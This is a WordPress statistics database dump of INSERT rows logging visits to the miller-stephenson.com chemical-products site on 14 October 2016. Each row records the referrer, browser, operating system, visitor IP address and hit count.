INSERT INTO `wp_statistics_visitor` VALUES (4155, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.13.85.145', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4156, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '94.199.127.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4157, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4158, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '173.70.114.202', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4159, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.1.121.138', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4160, '2016-10-14', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '174.200.27.107', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4161, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.161.125.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4162, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '107.77.80.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4163, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '174.199.25.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4164, '2016-10-14', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '99.68.90.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4165, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjb8Iap2trPAhWHBrwKHa8RDqsYABAA&sig=AOD64_1_EBGiFWy3llyoLwkYKfJ1KzLfgw&rct=j&q=&ved=0ahUKEwiDgYSp2trPAhXFoZQKHQF5B6sQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '209.203.79.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4166, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjphezg2trPAhULHoYKHXUUBigYABAG&sig=AOD64_35LqWRORCK9MeCpW8itFOEXlygfg&rct=j&frm=1&q=&ved=0ahUKEwiF3ujg2trPAhUE9x4KHXVNBSQQ0QwINA&adurl=', 'MSIE', 'Windows', '10.0', '', '74.96.112.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4167, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.79', '', '98.202.157.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4168, '2016-10-14', 'https://r.search.yahoo.com/_ylt=AwrBT9UMCQFYlPoAqvxXNyoA;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1476491660/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fkrytox-h-1-food-grade-lubricants%2f/RK=0/RS=czYngQeodDKsXTbWTXQOq5xSHkc-', 'MSIE', 'Windows', '11.0', '', '75.127.128.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4169, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4170, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4171, '2016-10-14', 'https://www.bing.com/search?q=MILLER+STEPHENSON+CHEMICAL+COMPANY+INC+&qs=n&form=QBLH&pq=miller+stephenson+chemical+company+inc+&sc=0-39&sp=-1&sk=&cvid=049B164D8F6A4332B216510B3AAA0EA3', 'Firefox', 'Windows', '49.0', '', '190.83.247.223', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4172, '2016-10-14', 'https://www.bing.com/search?q=krytox%20vacuum%20pump%20oil%20VPF-1525&qs=n&form=QBRE&pq=krytox%20vacuum%20pump%20oil%20vpf-1525&sc=0-31&sp=-1&sk=&cvid=A1CCC30F5C814099BC2B69FCA5E591E0', 'MSIE', 'Windows', '11.0', '', '214.3.115.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4173, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.192.145.46', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4174, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.3', '', '24.14.248.159', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4175, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4176, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4177, '2016-10-14', 'https://zaporizhia.mistr-x.org/', 'Opera', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4178, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.115.190.32', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4179, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4180, '2016-10-14', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '162.212.174.54', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4181, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&sqi=2&ved=0ahUKEwiVjsLv49rPAhXLRiYKHcheAWYQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '7.0', '', '64.184.0.98', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4182, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjLxcG35NrPAhVVOoEKHUszDS0YABAA&sig=AOD64_3vCyEJrIC2HJiZbLW339k_gs5skw&rct=j&q=&ved=0ahUKEwjBm7635NrPAhXM5yYKHTe1CVwQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '173.70.114.202', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4183, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '62.210.148.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4184, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '112.99.67.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4185, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '98.28.165.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4186, '2016-10-14', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '199.182.72.5', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4187, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjKjP6L59rPAhUDbR4KHdzWCTMQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,bs.1,d.dmo', 'MSIE', 'Windows', '11.0', '', '169.240.84.223', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4188, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.238.94.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4189, '2016-10-14', 'https://www.spacetechexpo.com/visit/exhibitor-list-2016', 'Chrome', 'Windows', '53.0.2785.116', '', '73.183.168.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4190, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjstdDA6NrPAhUUkX4KHctsBsoYABAE&sig=AOD64_1FAKsiH-qn15-bIyMgfl7afxu_Jg&rct=j&q=&ved=0ahUKEwiwrczA6NrPAhVW5mMKHYlvAzEQ0QwIfQ&adurl=', 'MSIE', 'Windows', '11.0', '', '24.237.120.25', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4191, '2016-10-14', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '53.0.2785.124', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4192, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4193, '2016-10-14', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4194, '2016-10-14', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwiNyaSC7drPAhXIg34KHWgeCu8YABAA&ei=FRoBWIvoMqiLjwTngbPgBw&sig=AOD64_11e15myM8eFrn8u0hjnXMVwE2Msg&rct=j&q=&sqi=2&ved=0ahUKEwjLxp6C7drPAhWoxYMKHefADHwQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '216.240.9.2', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4195, '2016-10-14', 'https://www.miller-stephenson.com/', 'Edge', 'Windows', '14.14393', '', '24.218.44.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4196, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjxwaKl7drPAhUMEIEKHcACADYYABAA&sig=AOD64_20LU-1JcI5P5tfw96VYdVde5WK1w&rct=j&q=&ved=0ahUKEwiWl5-l7drPAhXJ0iYKHe_eBoIQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '207.250.144.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4197, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '47.216.43.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4198, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '71.40.21.239', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4199, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '71.40.21.239', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4200, '2016-10-14', 'https://www.miller-stephenson.com/product/krytox-283az/', 'Safari', 'iPhone', '7.0', '', '65.55.210.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4201, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4202, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '108.41.58.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4203, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjo7een89rPAhVPJYEKHW6aBPUYABAN&sig=AOD64_2328axXXcSpwpHq353v6zkiElepA&rct=j&q=&ved=0ahUKEwi3quSn89rPAhUCQz4KHShBDDAQ0QwIwAE&adurl=', 'MSIE', 'Windows', '11.0', '', '162.211.108.38', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4204, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.229.49.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4205, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.3', '', '67.68.178.187', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4206, '2016-10-14', 'https://www.bing.com/search?q=MILLER+STEPHENSON+MS-322B&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '107.0.202.3', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4207, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '12602.1.50.0.10', '', '67.191.250.183', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4208, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '67.191.250.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4209, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '100.40.108.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4210, '2016-10-14', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '67.191.250.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4211, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.237.224.214', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4212, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '49.0.2623.91', '', '174.237.130.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4213, '2016-10-14', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4214, '2016-10-14', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '170.248.164.150', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4215, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.95', '', '199.107.68.202', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4216, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4217, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4218, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.193.122.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4219, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '219.134.106.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4220, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.153.50.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4221, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '50.200.214.58', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4222, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '58.60.167.66', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4223, '2016-10-14', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.223.30.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4224, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjU3vK4-9rPAhUJ6yYKHU_9CgwQFgh9MAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw', 'MSIE', 'Windows', '11.0', '', '98.189.136.151', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4225, '2016-10-14', 'https://www.miller-stephenson.com', 'M', 'Unknown', 'Unknown', '', '207.182.140.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4226, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0ahUKEwj88JDp6trPAhXDpx4KHWAtBMw4ChAWCHswCA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA', 'MSIE', 'Windows', '11.0', '', '141.189.251.1', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4227, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.145.28.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4228, '2016-10-14', 'https://r.search.yahoo.com/_ylt=A0LEViWILAFYJeYA4vQnnIlQ;_ylu=X3oDMTEyb2FrbGNsBGNvbG8DYmYxBHBvcwM2BHZ0aWQDQjI1ODBfMQRzZWMDc3I-/RV=2/RE=1476500745/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fmiller%2fpdf%2fMS-114C.pdf/RK=0/RS=RJqKhcqqul1NCoKT9dGERi7EhgY-', 'Firefox', 'Windows', '38.0', '', '98.109.101.115', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4229, '2016-10-14', 'https://www.google.com/url?url=https://www.miller-stephenson.com/product/ms-462h/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjKp_zW_trPAhWLMj4KHYMGCEoQFggZMAE&usg=AFQjCNHyo5TTAhtIrn-LwOc6iyVjo-YJJg', 'MSIE', 'Windows', '9.0', '', '66.32.17.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4230, '2016-10-14', 'https://search.xfinity.com/', 'Firefox', 'Windows', '49.0', '', '70.90.249.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4231, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '70.210.150.195', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4232, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '158.106.67.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4233, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjzzq-b_trPAhWGO4EKHdiaAusYABAJ&sig=AOD64_3XJtvUjvVwafdyzEFmwf7qAEJTYg&rct=j&q=&ved=0ahUKEwi0oayb_trPAhWKNT4KHYqtAzsQ0QwIMQ&adurl=', 'MSIE', 'Windows', '11.0', '', '74.76.202.248', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4234, '2016-10-14', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '72.75.238.122', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4235, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.14.212.162', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4236, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '67.84.143.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4237, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0ahUKEwicxu69hNvPAhUl1oMKHZtIDNQQ_BcIcTAO&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.amc', 'MSIE', 'Windows', '11.0', '', '64.201.75.163', '000', 36, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4238, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '66.229.161.220', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4239, '2016-10-14', 'https://www.bing.com/search?q=thread+sealant+non+reactive+with+chlorine&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4240, '2016-10-14', 'https://www.miller-stephenson.com/product/krytox-ts4-thread-sealant/', 'MSIE', 'Windows', '9.0', '', '204.79.180.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4241, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '600.1.4', '', '24.35.170.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4242, '2016-10-14', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '216.108.162.56', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4243, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '165.156.24.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4244, '2016-10-14', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '80.32.137.218', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4245, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '12.199.138.2', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4246, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '74.208.16.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4247, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '104.131.161.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4248, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '95.168.206.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4249, '2016-10-14', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.96.104.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4250, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.93.69.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4251, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.63.197.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4252, '2016-10-14', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.143', '', '200.139.168.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4253, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '117.68.210.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4254, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4255, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.193.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4256, '2016-10-14', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwi54aCMldvPAhXNYX4KHeYKC5MYABAA&sig=AOD64_3l0g5moLeDZqttncF_rJJXmfKB9w&rct=j&q=&ved=0ahUKEwil1Z2MldvPAhUBwGMKHXOKBx0Q0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '209.53.168.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4257, '2016-10-14', 'https://www.miller-stephenson.com/products/epon_epoxy_resins_modifiers__curing_agents.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.25.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4258, '2016-10-14', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '53.0.2785.124', '', '187.55.207.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4259, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '53.0.2785.116', '', '104.198.146.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4260, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.53.208.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4261, '2016-10-14', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '68.70.60.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4262, '2016-10-14', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '71.1.180.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4263, '2016-10-14', 'https://www.bing.com/search?q=miller+stephenson+chemical&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4264, '2016-10-14', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '9.0', '', '204.79.180.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4265, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjbxLjUm9vPAhWqhlQKHU6OBWkQFgghMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-381HC%2C%2520383H.pdf&usg=AFQjCNGPTNO91by-BJTZeMCiGX48f23kYg', 'MSIE', 'Windows', '11.0', '', '204.27.197.5', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4266, '2016-10-14', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjnlfiVmNvPAhVQbX4KHVlFCJIYABAB&ei=VUcBWMyoMcuo0gKpkqe4Bw&sig=AOD64_0jCV08vNfwmek5J2g7qL_nPhMuuQ&ctype=4&rct=j&q=&sqi=2&ved=0ahUKEwiMp_SVmNvPAhVLlFQKHSnJCXcQwgUIngEoAA&adurl=', 'Safari', 'Macintosh', '6.2.8', '', '166.137.8.59', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4267, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '23.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4268, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.252.115.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4269, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.81.209.66', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4270, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.177.132.179', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4271, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4272, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.139.136.68', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4273, '2016-10-14', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '104.228.60.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4274, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '151.159.17.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4275, '2016-10-14', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '71.169.3.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4276, '2016-10-14', 'https://www.google.co.ve/', 'Chrome', 'Windows', '53.0.2785.143', '', '190.153.37.140', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4277, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '49.0.2623.112', '', '50.74.133.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4278, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '199.48.185.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4279, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.28', '000', 1, 0); 
